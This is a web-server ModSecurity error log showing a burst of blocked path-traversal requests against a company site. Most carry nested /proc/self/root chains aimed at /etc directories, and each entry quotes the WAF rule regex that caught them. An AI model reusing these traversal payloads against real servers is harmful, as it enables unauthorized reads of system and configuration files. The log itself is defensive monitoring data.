[Wed Mar 18 06:35:20.673558 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:36792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpx2OoXxyEfFpUF8f9BEAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:35:49.112216 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:47224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpx9dY0UrI5A3LftIxsbQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:36:03.586961 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:44814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyA9a6ubjKNq_cu4ZqgwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:36:22.485245 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:47584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyFsdf6f5d65gmYZSmpQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:36:33.988072 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:47598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyIda6ubjKNq_cu4ZqkQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:36:40.610559 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:43298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyKNY0UrI5A3LftIxseAAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:36:48.784285 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:42352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyMNa6ubjKNq_cu4ZqngAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:37:03.696718 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:35230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyP0zinOy1jxa1j4fnTwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:37:05.214253 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:49846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyQcdf6f5d65gmYZSmsgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:37:35.154184 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.228.61:49856] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpyX9Y0UrI5A3LftIxsnAAAAZU"]
[Wed Mar 18 06:37:38.580754 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.244.43:33090] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpyYuyqAr6etmhZHNqPvwAAAFI"]
[Wed Mar 18 06:38:31.391346 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.241.31:51034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpylymAPhZkrhU8w4lCgQAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:38:46.652885 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:54784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpypuyqAr6etmhZHNqP7AAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:38:47.955660 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:52938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyp9Y0UrI5A3LftIxsuwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:39:17.187483 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:52946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyxcdf6f5d65gmYZSm_gAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:39:22.779741 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:34020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpyyuyqAr6etmhZHNqQDQAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:40:34.575050 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:34022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzEuoXxyEfFpUF8f9BjgAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 06:40:54.797154 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:53138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzJtY0UrI5A3LftIxtYgAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:41:26.196529 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:48930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzRuw_le52K8_3pV21NQAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:41:48.438667 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:46362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzXNY0UrI5A3LftIxtpQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:49.759015 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:48182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzXUzinOy1jxa1j4fnqgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:51.104891 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:48198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzXymAPhZkrhU8w4lCrwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:52.408812 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:48206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzYPu8EFLIOrSqIpvaGwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:53.728298 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:48208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 